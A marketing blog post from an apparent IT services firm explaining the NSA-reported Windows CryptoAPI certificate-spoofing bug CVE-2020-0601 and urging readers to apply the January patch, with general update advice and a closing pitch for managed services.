A recently discovered security bug in Windows 10 is so nasty that the National Security Agency reported its existence. If you have any Windows 10 machines, and have not updated since January 15th, 2019, run a system update now. The bug also affects Windows Server 2016 and 2019.
The bug is in Microsoft’s CryptoAPI. It concerns cryptographic certificates, including X.509 certificates, which are the basis for HTTPS security. Malicious parties can use the vulnerability to spoof a website. A malicious public Wi-Fi hotspot could impersonate a trusted, supposedly secure banking or e-commerce site, and Windows would fail to detect the spoofing. It could read encrypted traffic in transit, stealing confidential form submission information.
The same bug lets a criminal modify an application for downloading and create a forged Authenticode digital signature, creating the impression that it is from a trusted source and has not been tampered with. Combining the two techniques would make it possible to impersonate a download site and deliver infected applications without being detected.
The discovery of the bug
This report represents a shift from the NSA’s earlier practice of discovering security bugs and leaving them unreported so that it could use them for espionage. Their previous practice backfired when criminals stole its software to create the WannaCry ransomware. Anne Neuberger, head of the NSA’s Cybersecurity Directorate, called its response to this issue a “change in approach” aimed at “building trust.”
By reporting the present bug to Microsoft, the creation of a patch closed the vulnerability. It is inevitable, though, that many systems will not get the update for a long time, if ever.
The bug is formally known as CVE-2020-0601. The CERT notification provides technical details.
Windows 7 is reportedly unaffected by the problem, which is a good thing since support for it came to an end on the same day as the announcement. Even so, you should update any systems running Windows 8 or older to Windows 10 as quickly as possible. Any vulnerabilities in them that are discovered from now on will not get fixed.
Fixing the problem
Military and selected private organizations got the patch under secrecy before the public announcement. It is now available to all licensed Windows 10 systems.
If you have automatic updates enabled, you should already be in good shape. It does not hurt to verify that the updates are happening. If you do not use automatic updates, open the Start menu, and select "Windows Update." The January update fixes many other security issues at the same time.
As always, avoid panicked reactions. There will certainly be fraudulent email campaigns with "security fixes" that are malware. Use only standard update procedures through a trusted Internet connection.
If you have a lot of systems to update, give priority to endpoints that are connected directly to the Internet, as well as Web and proxy servers.
Windows Defender and Microsoft Security Essentials have been updated to detect the threat, and they are available for older operating systems. They are not a substitute for an up-to-date system, but having multiple layers of protection is wise.
Keeping up with security updates
Most security issues are not as alarming as this one, but weaknesses in applications and operating systems turn up regularly. It is essential to keep the OS and Internet-facing applications on your systems up to date with the latest security patches.
If your business does not have a dedicated IT staff, or if dealing with employee and customer issues takes up all your time, you should consider getting trusted professional assistance for managing your system updates and security issues. We offer managed services and cybersecurity training, letting your staff focus on providing service for your business. Contact us to find out more about how we can help your IT operations.